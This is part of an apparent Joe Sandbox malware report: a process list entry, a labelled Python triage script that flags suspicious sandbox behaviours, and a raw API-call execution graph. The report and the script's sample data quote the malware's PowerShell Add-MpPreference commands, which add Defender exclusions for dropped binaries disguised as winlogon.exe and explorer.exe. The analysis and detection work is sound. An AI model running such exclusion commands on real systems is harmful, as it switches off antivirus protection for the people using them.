                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false
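The process list above shows the pattern the report's signatures call out: powershell.exe adding Defender exclusions with Add-MpPreference for each dropped copy, one payload (MD5 CADD0C3B32099635F889BA630C4697F4) written to several paths under benign names such as winlogon.exe and explorer.exe outside C:\Windows, and ping -n 10 localhost used as a delay. The following triage script is an added example, not part of the Joe Sandbox report: it parses process blocks in the report's own "Field:value" layout and flags those behaviours. SAMPLE_REPORT is a constructed excerpt built from five of the entries above; the SYSTEM_NAMES allow-list, the regular expressions and the finding strings are this example's own assumptions, not anything the report defines.

```python
"""Triage helper for Joe Sandbox process blocks (added example, not report code)."""
import re
from collections import defaultdict

# Constructed excerpt in the report's "Field:value" layout; values copied from the entries above.
SAMPLE_REPORT = """
Target ID:40
Path:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\\Users\\All Users\\SoftwareDistribution\\winlogon.exe'
MD5 hash:04029E121A0CFA5991749937DD22A1D9

Target ID:49
Path:C:\\ProgramData\\SoftwareDistribution\\winlogon.exe
Commandline:"C:\\Users\\All Users\\SoftwareDistribution\\winlogon.exe"
MD5 hash:CADD0C3B32099635F889BA630C4697F4

Target ID:54
Path:C:\\Windows\\System32\\PING.EXE
Commandline:ping -n 10 localhost
MD5 hash:2F46799D79D22AC72C241EC0322B011D

Target ID:55
Path:C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\explorer.exe
Commandline:C:\\Users\\Default\\NetHood\\explorer.exe
MD5 hash:CADD0C3B32099635F889BA630C4697F4

Target ID:56
Path:C:\\Browserhost\\intoHostperf.exe
Commandline:C:\\Browserhost\\intoHostperf.exe
MD5 hash:CADD0C3B32099635F889BA630C4697F4
"""

# Assumed allow-list: directories where a binary with this name legitimately lives.
SYSTEM_NAMES = {
    "winlogon.exe": {r"c:\windows\system32"},
    "explorer.exe": {r"c:\windows", r"c:\windows\syswow64"},
    "conhost.exe": {r"c:\windows\system32"},
}

# Defender exclusion added from the command line (path, process or extension form).
EXCLUSION_RE = re.compile(r"add-mppreference\s+-exclusion(path|process|extension)\s+'([^']+)'", re.I)
# ping -n <count> against the local host: each extra request is roughly a one-second delay.
PING_SLEEP_RE = re.compile(r"\bping(?:\.exe)?\s+-n\s+(\d+)\s+(localhost|127\.0\.0\.1)\b", re.I)


def parse_processes(text):
    """Split the report text into one dict per 'Target ID' block."""
    procs, cur = [], None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        field, _, value = line.partition(":")  # first colon separates field from value
        if field == "Target ID":
            cur = {"Target ID": value}
            procs.append(cur)
        elif cur is not None:
            cur[field] = value
    return procs


def triage(text):
    """Return (target_id, finding) tuples: per-process findings first, then cross-process ones."""
    findings = []
    by_hash = defaultdict(set)
    for p in parse_processes(text):
        tid, path, cmd = p["Target ID"], p.get("Path", ""), p.get("Commandline", "")
        name = path.rsplit("\\", 1)[-1].lower()
        parent = path.rsplit("\\", 1)[0].lower() if "\\" in path else ""
        by_hash[p.get("MD5 hash", "").upper()].add(path)

        m = EXCLUSION_RE.search(cmd)
        if m:
            findings.append((tid, f"defender exclusion added: {m.group(2)}"))
        if name in SYSTEM_NAMES and parent not in SYSTEM_NAMES[name]:
            findings.append((tid, f"system binary name outside expected dir: {path}"))
        m = PING_SLEEP_RE.search(cmd)
        if m and int(m.group(1)) > 1:
            findings.append((tid, f"ping-based sleep of ~{int(m.group(1)) - 1}s"))

    # One hash at several paths is the "drops PE files with benign system names" pattern.
    for h, paths in by_hash.items():
        if h and len(paths) > 1:
            findings.append(("*", f"hash {h} present at {len(paths)} paths: {sorted(paths)}"))
    return findings


if __name__ == "__main__":
    for tid, finding in triage(SAMPLE_REPORT):
        print(tid, finding)
```

On the constructed excerpt this yields five findings: the exclusion for the SoftwareDistribution copy of winlogon.exe, the two system-named binaries running from ProgramData and the Default user's Network Shortcuts folder, the nine-second ping delay, and the single MD5 present at three paths. On a live host the same exclusion check should be complemented by reading the current Defender configuration back, since an exclusion that was added successfully will not show up in later process telemetry.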


                                                              Execution Graph

                                                              Execution Coverage:9.5%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:9.3%
                                                              Total number of Nodes:1511
                                                              Total number of Limit Nodes:42
                                                              execution_graph: the interactive node/edge dump of the graph is not reproduced here. API calls named in the graph nodes include: GdipCloneImage, GdipAlloc, GdipDisposeImage, GdipFree (GDI+ image handling); LoadLibraryExA, GetProcAddress, GetModuleHandleW, FreeLibrary, GetLastError, RaiseException, VirtualProtect, VirtualQuery, GetSystemInfo (the delay-load helper ___delayLoadHelper2@8 with DloadProtectSection and DloadReleaseSectionWriteAccess); GetFileAttributesW, SetFileAttributesW, DeleteFileW, MoveFileW, MoveFileExW, GetFullPathNameW, GetCurrentDirectoryW, ExpandEnvironmentStringsW, FindClose, SetFilePointer, WriteFile, GetStdHandle (file and path handling); GetExitCodeProcess, CloseHandle, ShowWindow, SetWindowTextW, GetDlgItem, SendMessageW, CompareStringW, _wcschr, _wcslen, _swprintf (process, window and string handling); RtlAllocateHeap, HeapReAlloc, EnterCriticalSection, LeaveCriticalSection, GetACP, GetOEMCP, GetCPInfo, IsValidCodePage, MultiByteToWideChar, GetStringTypeW, QueryPerformanceFrequency, QueryPerformanceCounter, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, LocalFree (CRT runtime support, including ___security_init_cookie and ConvertBSTRToString).
43a99c MultiByteToWideChar 25369->25370 25371 43ab50 25370->25371 25372 43a9c6 25370->25372 25373 42fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25371->25373 25377 438e06 __vswprintf_c_l 21 API calls 25372->25377 25379 43a9e7 __vsnwprintf_l 25372->25379 25374 43ab63 25373->25374 25374->25347 25375 43aa30 MultiByteToWideChar 25376 43aa9c 25375->25376 25378 43aa49 25375->25378 25404 43abc3 20 API calls _free 25376->25404 25377->25379 25395 43af6c 25378->25395 25379->25375 25379->25376 25383 43aa73 25383->25376 25386 43af6c __vswprintf_c_l 11 API calls 25383->25386 25384 43aaab 25385 438e06 __vswprintf_c_l 21 API calls 25384->25385 25389 43aacc __vsnwprintf_l 25384->25389 25385->25389 25386->25376 25387 43ab41 25403 43abc3 20 API calls _free 25387->25403 25389->25387 25390 43af6c __vswprintf_c_l 11 API calls 25389->25390 25391 43ab20 25390->25391 25391->25387 25392 43ab2f WideCharToMultiByte 25391->25392 25392->25387 25393 43ab6f 25392->25393 25405 43abc3 20 API calls _free 25393->25405 25396 43ac98 _abort 5 API calls 25395->25396 25397 43af93 25396->25397 25400 43af9c 25397->25400 25406 43aff4 10 API calls 3 library calls 25397->25406 25399 43afdc LCMapStringW 25399->25400 25401 42fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25400->25401 25402 43aa60 25401->25402 25402->25376 25402->25383 25402->25384 25403->25376 25404->25371 25405->25376 25406->25399 25434 43c030 GetProcessHeap 23468 42dec2 23469 42decf 23468->23469 23476 41e617 23469->23476 23477 41e627 23476->23477 23488 41e648 23477->23488 23480 414092 23511 414065 23480->23511 23483 42b568 PeekMessageW 23484 42b583 GetMessageW 23483->23484 23485 42b5bc 23483->23485 23486 42b5a8 TranslateMessage DispatchMessageW 23484->23486 23487 42b599 IsDialogMessageW 23484->23487 23486->23485 23487->23485 23487->23486 23494 41d9b0 23488->23494 23491 41e645 23491->23480 23492 41e66b LoadStringW 23492->23491 23493 41e682 LoadStringW 23492->23493 23493->23491 23499 41d8ec 
23494->23499 23496 41d9cd 23497 41d9e2 23496->23497 23507 41d9f0 26 API calls 23496->23507 23497->23491 23497->23492 23500 41d904 23499->23500 23506 41d984 _strncpy 23499->23506 23502 41d928 23500->23502 23508 421da7 WideCharToMultiByte 23500->23508 23505 41d959 23502->23505 23509 41e5b1 50 API calls __vsnprintf 23502->23509 23510 436159 26 API calls 3 library calls 23505->23510 23506->23496 23507->23497 23508->23502 23509->23505 23510->23506 23512 41407c __vsnwprintf_l 23511->23512 23515 435fd4 23512->23515 23518 434097 23515->23518 23519 4340d7 23518->23519 23520 4340bf 23518->23520 23519->23520 23522 4340df 23519->23522 23542 4391a8 20 API calls _abort 23520->23542 23544 434636 23522->23544 23523 4340c4 23543 439087 26 API calls _abort 23523->23543 23529 434167 23553 4349e6 51 API calls 4 library calls 23529->23553 23530 414086 SetDlgItemTextW 23530->23483 23533 4340cf 23535 42fbbc 23533->23535 23534 434172 23554 4346b9 20 API calls _free 23534->23554 23536 42fbc4 23535->23536 23537 42fbc5 IsProcessorFeaturePresent 23535->23537 23536->23530 23539 42fc07 23537->23539 23555 42fbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23539->23555 23541 42fcea 23541->23530 23542->23523 23543->23533 23545 434653 23544->23545 23551 4340ef 23544->23551 23545->23551 23556 4397e5 GetLastError 23545->23556 23547 434674 23576 43993a 38 API calls __cftof 23547->23576 23549 43468d 23577 439967 38 API calls __cftof 23549->23577 23552 434601 20 API calls 2 library calls 23551->23552 23552->23529 23553->23534 23554->23533 23555->23541 23557 439801 23556->23557 23558 4397fb 23556->23558 23562 439850 SetLastError 23557->23562 23579 43b136 23557->23579 23578 43ae5b 11 API calls 2 library calls 23558->23578 23562->23547 23563 43981b 23586 438dcc 23563->23586 23566 439830 23566->23563 23568 439837 23566->23568 23567 439821 23569 43985c SetLastError 23567->23569 23593 439649 20 API calls _abort 23568->23593 23594 438d24 38 API calls _abort 
23569->23594 23572 439842 23574 438dcc _free 20 API calls 23572->23574 23575 439849 23574->23575 23575->23562 23575->23569 23576->23549 23577->23551 23578->23557 23584 43b143 _abort 23579->23584 23580 43b183 23596 4391a8 20 API calls _abort 23580->23596 23581 43b16e RtlAllocateHeap 23582 439813 23581->23582 23581->23584 23582->23563 23592 43aeb1 11 API calls 2 library calls 23582->23592 23584->23580 23584->23581 23595 437a5e 7 API calls 2 library calls 23584->23595 23587 438dd7 RtlFreeHeap 23586->23587 23588 438e00 __dosmaperr 23586->23588 23587->23588 23589 438dec 23587->23589 23588->23567 23597 4391a8 20 API calls _abort 23589->23597 23591 438df2 GetLastError 23591->23588 23592->23566 23593->23572 23595->23584 23596->23582 23597->23591 25479 42b5c0 100 API calls 25480 4277c0 118 API calls 25481 42ffc0 RaiseException _com_error::_com_error CallUnexpected 25435 4262ca 123 API calls __InternalCxxFrameHandler 25438 42f4d3 20 API calls 23663 42e1d1 14 API calls ___delayLoadHelper2@8 25483 43a3d0 21 API calls 2 library calls 23664 4110d5 23669 415abd 23664->23669 23670 415ac7 __EH_prolog 23669->23670 23676 41b505 23670->23676 23672 415ad3 23682 415cac GetCurrentProcess GetProcessAffinityMask 23672->23682 23677 41b50f __EH_prolog 23676->23677 23683 41f1d0 82 API calls 23677->23683 23679 41b521 23684 41b61e 23679->23684 23683->23679 23685 41b630 _abort 23684->23685 23688 4210dc 23685->23688 23691 42109e GetCurrentProcess GetProcessAffinityMask 23688->23691 23692 41b597 23691->23692 23692->23672 25484 442bd0 VariantClear 23693 42e2d7 23694 42e1db 23693->23694 23695 42e85d ___delayLoadHelper2@8 14 API calls 23694->23695 23695->23694 25440 430ada 51 API calls 2 library calls 23803 4113e1 84 API calls 2 library calls 23804 42b7e0 23805 42b7ea __EH_prolog 23804->23805 23970 411316 23805->23970 23808 42b82a 23811 42b89b 23808->23811 23812 42b838 23808->23812 23882 42b841 23808->23882 23809 42bf0f 24042 42d69e 23809->24042 23814 42b92e GetDlgItemTextW 23811->23814 23819 42b8b1 
23811->23819 23815 42b878 23812->23815 23816 42b83c 23812->23816 23814->23815 23822 42b96b 23814->23822 23827 42b95f EndDialog 23815->23827 23815->23882 23825 41e617 53 API calls 23816->23825 23816->23882 23817 42bf2a SendMessageW 23818 42bf38 23817->23818 23820 42bf52 GetDlgItem SendMessageW 23818->23820 23821 42bf41 SendDlgItemMessageW 23818->23821 23824 41e617 53 API calls 23819->23824 24060 42a64d GetCurrentDirectoryW 23820->24060 23821->23820 23823 42b980 GetDlgItem 23822->23823 23968 42b974 23822->23968 23828 42b9b7 SetFocus 23823->23828 23829 42b994 SendMessageW SendMessageW 23823->23829 23830 42b8ce SetDlgItemTextW 23824->23830 23831 42b85b 23825->23831 23827->23882 23833 42b9c7 23828->23833 23849 42b9e0 23828->23849 23829->23828 23834 42b8d9 23830->23834 24080 41124f SHGetMalloc 23831->24080 23832 42bf82 GetDlgItem 23836 42bfa5 SetWindowTextW 23832->23836 23837 42bf9f 23832->23837 23839 41e617 53 API calls 23833->23839 23842 42b8e6 GetMessageW 23834->23842 23834->23882 24061 42abab GetClassNameW 23836->24061 23837->23836 23843 42b9d1 23839->23843 23840 42be55 23844 41e617 53 API calls 23840->23844 23847 42b8fd IsDialogMessageW 23842->23847 23842->23882 24081 42d4d4 23843->24081 23845 42be65 SetDlgItemTextW 23844->23845 23851 42be79 23845->23851 23847->23834 23853 42b90c TranslateMessage DispatchMessageW 23847->23853 23854 41e617 53 API calls 23849->23854 23850 42c1fc SetDlgItemTextW 23850->23882 23855 41e617 53 API calls 23851->23855 23853->23834 23857 42ba17 23854->23857 23893 42be9c _wcslen 23855->23893 23856 42bff0 23862 42c020 23856->23862 23865 41e617 53 API calls 23856->23865 23858 414092 _swprintf 51 API calls 23857->23858 23863 42ba29 23858->23863 23859 42b9d9 23980 41a0b1 23859->23980 23861 42c73f 97 API calls 23861->23856 23866 42c73f 97 API calls 23862->23866 23923 42c0d8 23862->23923 23867 42d4d4 16 API calls 23863->23867 23871 42c003 SetDlgItemTextW 23865->23871 23872 42c03b 23866->23872 23867->23859 23868 42c18b 23873 42c194 EnableWindow 
23868->23873 23874 42c19d 23868->23874 23869 42ba73 23986 42ac04 SetCurrentDirectoryW 23869->23986 23870 42ba68 GetLastError 23870->23869 23876 41e617 53 API calls 23871->23876 23883 42c04d 23872->23883 23913 42c072 23872->23913 23873->23874 23879 42c1ba 23874->23879 24099 4112d3 GetDlgItem EnableWindow 23874->24099 23875 42beed 23878 41e617 53 API calls 23875->23878 23880 42c017 SetDlgItemTextW 23876->23880 23878->23882 23886 42c1e1 23879->23886 23898 42c1d9 SendMessageW 23879->23898 23880->23862 23881 42ba87 23887 42ba90 GetLastError 23881->23887 23888 42ba9e 23881->23888 24097 429ed5 32 API calls 23883->24097 23884 42c0cb 23889 42c73f 97 API calls 23884->23889 23886->23882 23900 41e617 53 API calls 23886->23900 23887->23888 23890 42bb11 23888->23890 23894 42bb20 23888->23894 23899 42baae GetTickCount 23888->23899 23889->23923 23890->23894 23895 42bd56 23890->23895 23892 42c1b0 24100 4112d3 GetDlgItem EnableWindow 23892->24100 23893->23875 23901 41e617 53 API calls 23893->23901 23902 42bcfb 23894->23902 23903 42bcf1 23894->23903 23904 42bb39 GetModuleFileNameW 23894->23904 24002 4112f1 GetDlgItem ShowWindow 23895->24002 23896 42c066 23896->23913 23898->23886 23907 414092 _swprintf 51 API calls 23899->23907 23908 42b862 23900->23908 23909 42bed0 23901->23909 23912 41e617 53 API calls 23902->23912 23903->23815 23903->23902 24091 41f28c 82 API calls 23904->24091 23905 42c169 24098 429ed5 32 API calls 23905->24098 23915 42bac7 23907->23915 23908->23850 23908->23882 23916 414092 _swprintf 51 API calls 23909->23916 23919 42bd05 23912->23919 23913->23884 23920 42c73f 97 API calls 23913->23920 23914 42bd66 24003 4112f1 GetDlgItem ShowWindow 23914->24003 23987 41966e 23915->23987 23916->23875 23917 42bb5f 23924 414092 _swprintf 51 API calls 23917->23924 23918 42c188 23918->23868 23925 414092 _swprintf 51 API calls 23919->23925 23926 42c0a0 23920->23926 23922 41e617 53 API calls 23922->23923 23923->23868 23923->23905 23923->23922 23928 42bb81 CreateFileMappingW 
23924->23928 23929 42bd23 23925->23929 23926->23884 23930 42c0a9 DialogBoxParamW 23926->23930 23927 42bd70 23931 41e617 53 API calls 23927->23931 23933 42bbe3 GetCommandLineW 23928->23933 23963 42bc60 __InternalCxxFrameHandler 23928->23963 23941 41e617 53 API calls 23929->23941 23930->23815 23930->23884 23934 42bd7a SetDlgItemTextW 23931->23934 23936 42bbf4 23933->23936 24004 4112f1 GetDlgItem ShowWindow 23934->24004 23935 42baed 23938 42baff 23935->23938 23939 42baf4 GetLastError 23935->23939 24092 42b425 SHGetMalloc 23936->24092 23995 41959a 23938->23995 23939->23938 23945 42bd3d 23941->23945 23942 42bd8c SetDlgItemTextW GetDlgItem 23946 42bdc1 23942->23946 23947 42bda9 GetWindowLongW SetWindowLongW 23942->23947 23944 42bc10 24093 42b425 SHGetMalloc 23944->24093 24005 42c73f 23946->24005 23947->23946 23950 42bc1c 24094 42b425 SHGetMalloc 23950->24094 23953 42c73f 97 API calls 23954 42bddd 23953->23954 24030 42da52 23954->24030 23955 42bc28 24095 41f3fa 82 API calls 2 library calls 23955->24095 23958 42bccb 23958->23903 23962 42bce1 UnmapViewOfFile CloseHandle 23958->23962 23960 42bc3f MapViewOfFile 23960->23963 23961 42c73f 97 API calls 23966 42be03 23961->23966 23962->23903 23963->23958 23964 42bcb7 Sleep 23963->23964 23964->23958 23964->23963 23965 42be2c 24096 4112d3 GetDlgItem EnableWindow 23965->24096 23966->23965 23969 42c73f 97 API calls 23966->23969 23968->23815 23968->23840 23969->23965 23971 411378 23970->23971 23972 41131f 23970->23972 24102 41e2c1 GetWindowLongW SetWindowLongW 23971->24102 23974 411385 23972->23974 24101 41e2e8 62 API calls 2 library calls 23972->24101 23974->23808 23974->23809 23974->23882 23976 411341 23976->23974 23977 411354 GetDlgItem 23976->23977 23977->23974 23978 411364 23977->23978 23978->23974 23979 41136a SetWindowTextW 23978->23979 23979->23974 23982 41a0bb 23980->23982 23981 41a175 23981->23869 23981->23870 23982->23981 23983 41a14c 23982->23983 24103 41a2b2 23982->24103 23983->23981 23984 41a2b2 8 API calls 23983->23984 
23984->23981 23986->23881 23988 419678 23987->23988 23989 4196d5 CreateFileW 23988->23989 23990 4196c9 23988->23990 23989->23990 23991 41971f 23990->23991 23992 41bb03 GetCurrentDirectoryW 23990->23992 23991->23935 23993 419704 23992->23993 23993->23991 23994 419708 CreateFileW 23993->23994 23994->23991 23996 4195cf 23995->23996 23997 4195be 23995->23997 23996->23890 23997->23996 23998 4195d1 23997->23998 23999 4195ca 23997->23999 24129 419620 23998->24129 24124 41974e 23999->24124 24002->23914 24003->23927 24004->23942 24006 42c749 __EH_prolog 24005->24006 24007 42bdcf 24006->24007 24008 42b314 ExpandEnvironmentStringsW 24006->24008 24007->23953 24015 42c780 _wcslen _wcsrchr 24008->24015 24010 42b314 ExpandEnvironmentStringsW 24010->24015 24011 42ca67 SetWindowTextW 24011->24015 24014 433e3e 22 API calls 24014->24015 24015->24007 24015->24010 24015->24011 24015->24014 24017 42c855 SetFileAttributesW 24015->24017 24022 42cc31 GetDlgItem SetWindowTextW SendMessageW 24015->24022 24025 42cc71 SendMessageW 24015->24025 24144 421fbb CompareStringW 24015->24144 24145 42a64d GetCurrentDirectoryW 24015->24145 24147 41a5d1 6 API calls 24015->24147 24148 41a55a FindClose 24015->24148 24149 42b48e 76 API calls 2 library calls 24015->24149 24018 42c90f GetFileAttributesW 24017->24018 24029 42c86f _abort _wcslen 24017->24029 24018->24015 24021 42c921 DeleteFileW 24018->24021 24021->24015 24023 42c932 24021->24023 24022->24015 24024 414092 _swprintf 51 API calls 24023->24024 24026 42c952 GetFileAttributesW 24024->24026 24025->24015 24026->24023 24027 42c967 MoveFileW 24026->24027 24027->24015 24028 42c97f MoveFileExW 24027->24028 24028->24015 24029->24015 24029->24018 24146 41b991 51 API calls 3 library calls 24029->24146 24031 42da5c __EH_prolog 24030->24031 24150 420659 24031->24150 24033 42da8d 24154 415b3d 24033->24154 24035 42daab 24158 417b0d 24035->24158 24039 42dafe 24174 417b9e 24039->24174 24041 42bdee 24041->23961 24043 42d6a8 24042->24043 24668 42a5c6 24043->24668 
24046 42bf15 24046->23817 24046->23818 24047 42d6b5 GetWindow 24047->24046 24050 42d6d5 24047->24050 24048 42d6e2 GetClassNameW 24673 421fbb CompareStringW 24048->24673 24050->24046 24050->24048 24051 42d706 GetWindowLongW 24050->24051 24052 42d76a GetWindow 24050->24052 24051->24052 24053 42d716 SendMessageW 24051->24053 24052->24046 24052->24050 24053->24052 24054 42d72c GetObjectW 24053->24054 24674 42a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24054->24674 24056 42d743 24675 42a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24056->24675 24676 42a80c 8 API calls 24056->24676 24059 42d754 SendMessageW DeleteObject 24059->24052 24060->23832 24062 42abf1 24061->24062 24063 42abcc 24061->24063 24067 42b093 24062->24067 24679 421fbb CompareStringW 24063->24679 24065 42abdf 24065->24062 24066 42abe3 FindWindowExW 24065->24066 24066->24062 24068 42b09d __EH_prolog 24067->24068 24069 4113dc 84 API calls 24068->24069 24070 42b0bf 24069->24070 24680 411fdc 24070->24680 24073 42b0eb 24076 4119af 128 API calls 24073->24076 24074 42b0d9 24075 411692 86 API calls 24074->24075 24077 42b0e4 24075->24077 24079 42b10d __InternalCxxFrameHandler ___std_exception_copy 24076->24079 24077->23856 24077->23861 24078 411692 86 API calls 24078->24077 24079->24078 24080->23908 24082 42b568 5 API calls 24081->24082 24083 42d4e0 GetDlgItem 24082->24083 24084 42d536 SendMessageW SendMessageW 24083->24084 24085 42d502 24083->24085 24086 42d572 24084->24086 24087 42d591 SendMessageW SendMessageW SendMessageW 24084->24087 24088 42d50d ShowWindow SendMessageW SendMessageW 24085->24088 24086->24087 24089 42d5e7 SendMessageW 24087->24089 24090 42d5c4 SendMessageW 24087->24090 24088->24084 24089->23859 24090->24089 24091->23917 24092->23944 24093->23950 24094->23955 24095->23960 24096->23968 24097->23896 24098->23918 24099->23892 24100->23879 24101->23976 24102->23974 24104 41a2bf 24103->24104 24105 41a2e3 24104->24105 24106 41a2d6 CreateDirectoryW 24104->24106 24107 41a231 3 API calls 
24105->24107 24106->24105 24108 41a316 24106->24108 24109 41a2e9 24107->24109 24111 41a325 24108->24111 24116 41a4ed 24108->24116 24110 41a329 GetLastError 24109->24110 24112 41bb03 GetCurrentDirectoryW 24109->24112 24110->24111 24111->23982 24114 41a2ff 24112->24114 24114->24110 24115 41a303 CreateDirectoryW 24114->24115 24115->24108 24115->24110 24117 42ec50 24116->24117 24118 41a4fa SetFileAttributesW 24117->24118 24119 41a510 24118->24119 24120 41a53d 24118->24120 24121 41bb03 GetCurrentDirectoryW 24119->24121 24120->24111 24122 41a524 24121->24122 24122->24120 24123 41a528 SetFileAttributesW 24122->24123 24123->24120 24125 419781 24124->24125 24126 419757 24124->24126 24125->23996 24126->24125 24135 41a1e0 24126->24135 24131 41962c 24129->24131 24132 41964a 24129->24132 24130 419669 24130->23996 24131->24132 24133 419638 CloseHandle 24131->24133 24132->24130 24143 416bd5 76 API calls 24132->24143 24133->24132 24136 42ec50 24135->24136 24137 41a1ed DeleteFileW 24136->24137 24138 41a200 24137->24138 24139 41977f 24137->24139 24140 41bb03 GetCurrentDirectoryW 24138->24140 24139->23996 24141 41a214 24140->24141 24141->24139 24142 41a218 DeleteFileW 24141->24142 24142->24139 24143->24130 24144->24015 24145->24015 24146->24029 24147->24015 24148->24015 24149->24015 24151 420666 _wcslen 24150->24151 24178 4117e9 24151->24178 24153 42067e 24153->24033 24155 420659 _wcslen 24154->24155 24156 4117e9 78 API calls 24155->24156 24157 42067e 24156->24157 24157->24035 24159 417b17 __EH_prolog 24158->24159 24195 41ce40 24159->24195 24161 417b32 24201 42eb38 24161->24201 24163 417b5c 24210 424a76 24163->24210 24166 417c7d 24167 417c87 24166->24167 24169 417cf1 24167->24169 24242 41a56d 24167->24242 24172 417d50 24169->24172 24220 418284 24169->24220 24170 417d92 24170->24039 24172->24170 24248 41138b 74 API calls 24172->24248 24175 417bac 24174->24175 24177 417bb3 24174->24177 24176 422297 86 API calls 24175->24176 24176->24177 24179 4117ff 24178->24179 24190 41185a 
__InternalCxxFrameHandler 24178->24190 24180 411828 24179->24180 24191 416c36 76 API calls __vswprintf_c_l 24179->24191 24182 411887 24180->24182 24187 411847 ___std_exception_copy 24180->24187 24184 433e3e 22 API calls 24182->24184 24183 41181e 24192 416ca7 75 API calls 24183->24192 24186 41188e 24184->24186 24186->24190 24194 416ca7 75 API calls 24186->24194 24187->24190 24193 416ca7 75 API calls 24187->24193 24190->24153 24191->24183 24192->24180 24193->24190 24194->24190 24196 41ce4a __EH_prolog 24195->24196 24197 42eb38 8 API calls 24196->24197 24198 41ce8d 24197->24198 24199 42eb38 8 API calls 24198->24199 24200 41ceb1 24199->24200 24200->24161 24203 42eb3d ___std_exception_copy 24201->24203 24202 42eb57 24202->24163 24203->24202 24206 42eb59 24203->24206 24216 437a5e 7 API calls 2 library calls 24203->24216 24205 42f5c9 24218 43238d RaiseException 24205->24218 24206->24205 24217 43238d RaiseException 24206->24217 24209 42f5e6 24211 424a80 __EH_prolog 24210->24211 24212 42eb38 8 API calls 24211->24212 24213 424a9c 24212->24213 24214 417b8b 24213->24214 24219 420e46 80 API calls 24213->24219 24214->24166 24216->24203 24217->24205 24218->24209 24219->24214 24221 41828e __EH_prolog 24220->24221 24249 4113dc 24221->24249 24223 4182aa 24224 4182bb 24223->24224 24392 419f42 24223->24392 24227 4182f2 24224->24227 24257 411a04 24224->24257 24388 411692 24227->24388 24230 4182ee 24230->24227 24238 41a56d 7 API calls 24230->24238 24239 418389 24230->24239 24396 41c0c5 CompareStringW _wcslen 24230->24396 24233 4183e8 24284 411f6d 24233->24284 24238->24230 24276 418430 24239->24276 24241 4183f3 24241->24227 24288 413b2d 24241->24288 24300 41848e 24241->24300 24243 41a582 24242->24243 24247 41a5b0 24243->24247 24657 41a69b 24243->24657 24245 41a592 24246 41a597 FindClose 24245->24246 24245->24247 24246->24247 24247->24167 24248->24170 24250 4113e1 __EH_prolog 24249->24250 24251 41ce40 8 API calls 24250->24251 24252 411419 24251->24252 24253 42eb38 8 API calls 24252->24253 
24256 411474 _abort 24252->24256 24254 411461 24253->24254 24255 41b505 84 API calls 24254->24255 24254->24256 24255->24256 24256->24223 24258 411a0e __EH_prolog 24257->24258 24270 411a61 24258->24270 24273 411b9b 24258->24273 24397 4113ba 24258->24397 24260 411bd4 24264 413b2d 101 API calls 24260->24264 24260->24273 24261 411bc7 24409 41138b 74 API calls 24261->24409 24265 411c12 24264->24265 24266 411c5a 24265->24266 24268 413b2d 101 API calls 24265->24268 24269 411c8d 24266->24269 24266->24273 24410 41138b 74 API calls 24266->24410 24268->24265 24269->24273 24274 419e80 79 API calls 24269->24274 24270->24260 24270->24261 24270->24273 24271 413b2d 101 API calls 24272 411cde 24271->24272 24272->24271 24272->24273 24273->24230 24274->24272 24430 41cf3d 24276->24430 24278 418440 24434 4213d2 GetSystemTime SystemTimeToFileTime 24278->24434 24280 4183a3 24280->24233 24281 421b66 24280->24281 24439 42de6b 24281->24439 24285 411f72 __EH_prolog 24284->24285 24287 411fa6 24285->24287 24447 4119af 24285->24447 24287->24241 24289 413b39 24288->24289 24290 413b3d 24288->24290 24289->24241 24299 419e80 79 API calls 24290->24299 24291 413b4f 24292 413b78 24291->24292 24293 413b6a 24291->24293 24580 41286b 101 API calls 3 library calls 24292->24580 24294 413baa 24293->24294 24579 4132f7 89 API calls 2 library calls 24293->24579 24294->24241 24297 413b76 24297->24294 24581 4120d7 74 API calls 24297->24581 24299->24291 24301 418498 __EH_prolog 24300->24301 24304 4184d5 24301->24304 24311 418513 24301->24311 24606 428c8d 103 API calls 24301->24606 24303 4184f5 24305 4184fa 24303->24305 24306 41851c 24303->24306 24304->24303 24309 41857a 24304->24309 24304->24311 24305->24311 24607 417a0d 152 API calls 24305->24607 24306->24311 24608 428c8d 103 API calls 24306->24608 24309->24311 24582 415d1a 24309->24582 24311->24241 24312 418605 24312->24311 24588 418167 24312->24588 24315 418797 24316 41a56d 7 API calls 24315->24316 24319 418802 24315->24319 24316->24319 24318 41d051 82 API 
calls 24320 41885d 24318->24320 24594 417c0d 24319->24594 24320->24311 24320->24318 24321 41898b 24320->24321 24322 418992 24320->24322 24609 418117 84 API calls 24320->24609 24610 412021 74 API calls 24320->24610 24611 412021 74 API calls 24321->24611 24325 4189e1 24322->24325 24326 418a5f 24322->24326 24331 41a231 3 API calls 24325->24331 24334 418a4c 24325->24334 24336 418b14 24325->24336 24327 418ab6 24326->24327 24339 418a6a 24326->24339 24327->24334 24614 417fc0 97 API calls 24327->24614 24328 419105 24333 41959a 80 API calls 24328->24333 24329 418ab4 24330 41959a 80 API calls 24329->24330 24330->24311 24335 418a19 24331->24335 24333->24311 24334->24329 24334->24336 24335->24334 24612 4192a3 97 API calls 24335->24612 24336->24328 24348 418b82 24336->24348 24615 4198bc 24336->24615 24337 41ab1a 8 API calls 24340 418bd1 24337->24340 24339->24329 24613 417db2 101 API calls 24339->24613 24343 41ab1a 8 API calls 24340->24343 24360 418be7 24343->24360 24346 418b70 24619 416e98 77 API calls 24346->24619 24348->24337 24349 418cbc 24350 418e40 24349->24350 24351 418d18 24349->24351 24354 418e52 24350->24354 24355 418e66 24350->24355 24374 418d49 24350->24374 24352 418d8a 24351->24352 24353 418d28 24351->24353 24362 418167 19 API calls 24352->24362 24358 418d6e 24353->24358 24365 418d37 24353->24365 24356 419215 123 API calls 24354->24356 24357 423377 75 API calls 24355->24357 